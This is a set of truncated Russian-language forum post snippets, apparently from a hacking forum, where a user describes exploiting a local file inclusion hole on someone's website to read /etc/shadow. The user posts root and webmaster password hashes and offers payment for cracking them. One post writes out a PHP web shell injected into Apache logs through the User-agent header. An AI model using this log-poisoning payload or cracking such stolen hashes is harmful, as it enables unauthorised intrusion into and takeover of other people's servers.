Separate names with a comma.
тестировал предложенный по ссылке скрипт, он не верно номер файла в директории tmp показывает, поэтому ты проинклудить не можешь + файл очень...
просмотр директорий так иногда не хватает)
10 баксов на пиво, парни за хэш. Самому расшифровать не получилось. $1$u2WXAWub$/tfajEhJeePDRoGgBuqnD1
phpmyadmin на сайте не оказалось, насколько я понял. Нашел параметры подключения к БД, но логины/ пароли цепляются из БД. подскажите, куда дальше...
Да, я понял, что не include (к сожалению поздновато). посмотрю по поводу phpMyadmin. Подправил сообщение с сайтом)промашка вышла, спасибо.
на сайт в логи apache засунул через User-agent <?php echo '<form><input name="cmd" /></form>'; if(isset($_GET['cmd'])) system($_GET['cmd']); ?>...
В продолжение: нашел такой скрипт со следующим содержанием private $prepared_queries = null; private $db; private function...
в смысле не инклудяться?в логе же появляется php-скрипт, ток вот через браузер он не выполняется, а просто показывается содержимое лога, включая...
попробовал include в логи apache на тестовом сервере (параметр user-agent). Действительно в логи записалась строчка 10.200.16.52 - -...
Удалось получить доступ к логам web-сервера. Кстати, такой момент у меня это получается сделать только если редактирую запросы в webscarabe...
Спасибо большое за ответы. Файлы подключения к БД искал. Кстати, админка находится на том же ip, но с другим DNS в конфигах Apache вообще не нашел...
Всем привет!Исследую один сайт - присутствуют LFI, могу посмотреть /etc/shadow и т.п. Получил хэши для root и webmaster(md5(unix)) - расшифровать...
Так и не получилось расшифровать $1$.LIFbrXp$H4nMhqOumFD1NVIIjBi69/ Есть еще один... $1$u2WXAWub$/tfajEhJeePDRoGgBuqnD1 Помогите плиз
$1$.LIFbrXp$H4nMhqOumFD1NVIIjBi69/ Пробовал John the Riper не получилось. На публичных ресурсах по расшифровке тоже не нашелся. Прошу помочь
.LIFbrXp$H4nMhqOumFD1NVIIjBi69/ ОС Gentoo
